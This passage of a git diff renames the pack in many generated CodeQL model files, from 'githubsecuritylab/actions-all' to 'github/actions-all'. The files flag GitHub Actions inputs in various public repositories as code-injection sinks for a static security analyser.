"code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 8fca8591ceb..04e779b9579 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 819728cf718..7939469934e 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index d3eaca780b4..1af5c9435af 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index 42c00ea216b..bcb9dc853d6 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index a93d6a039d4..ec5b1a4e50c 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 8a7784a6f01..2f0bb66127b 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 1b22d43bfad..65953f0387a 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 7175dd9450b..035e331a007 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index dca0f00a4ec..1cf431a7573 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 5f75d4fd0cd..669d7f443b1 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index d34a6a1a388..b53f0949903 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index b7c5f7e214c..4e9af4a1a8e 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index eead3b5ace3..3fd31a3612f 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index be7043cfdbf..090bf1afc85 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 36bdef9ad9a..47afbc44f76 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 3d66b07df9f..4e173c717e5 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 2f8a3fbdfa6..8091471b3c0 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index e1acb54c724..a3b3a5624c1 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index 0a51c708799..22264f3f29f 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 0ee56c05777..e33a45e698b 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index f17216cf1e8..a2d5e1ef7a3 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 551010c6634..e0ae2bc70bd 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index bd64e336c17..7926fa4e083 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 7d545451867..2369c82bcb7 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index 1ad4a2b824d..d388b1a55b3 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index 60381d41f16..dade6e8c958 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index ac61ed797d5..9ac87054f10 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index 7eed41f755e..3f9f3f63207 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index f977f6a5cce..aff068890ad 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index c4bacdc9c2c..0304e585bb6 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index f4ee4920797..46950d380cb 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 5fae95e5def..2e3c2530eba 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 4115d6c98f7..58f3d831423 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index 536b37131c1..dfa20e1f9d7 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index 54f72118d87..144c4e456dc 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index bed9ae53110..51348fb1b56 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index 7e9f4e14e85..c3fa787b288 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 3a16fc74bb6..9845c089b32 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 686f1013dd8..2986040e8cd 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 6a6cb61c174..7dafcd5b71b 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 513cd4d7644..1b5fb0e1d97 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 2855a6d4e01..28ec54f1d9d 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 78a2cc4e0ce..21f35339952 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 8db73d2fc77..594b0cc9bb9 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 8b0deda070d..a2fbd510bb2 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 3f7a7e7fda8..927cbd449e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 9746a118691..52037a671cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index 6208645b1b7..b71a87193b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index e66e7326701..24361a7d29e 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index 471ce3a672a..be71c38f124 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 1af30be9f35..889edaac1bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index ee3d9d0a8ef..b2b970152de 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index 493594e3b81..f885a44f46e 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file 
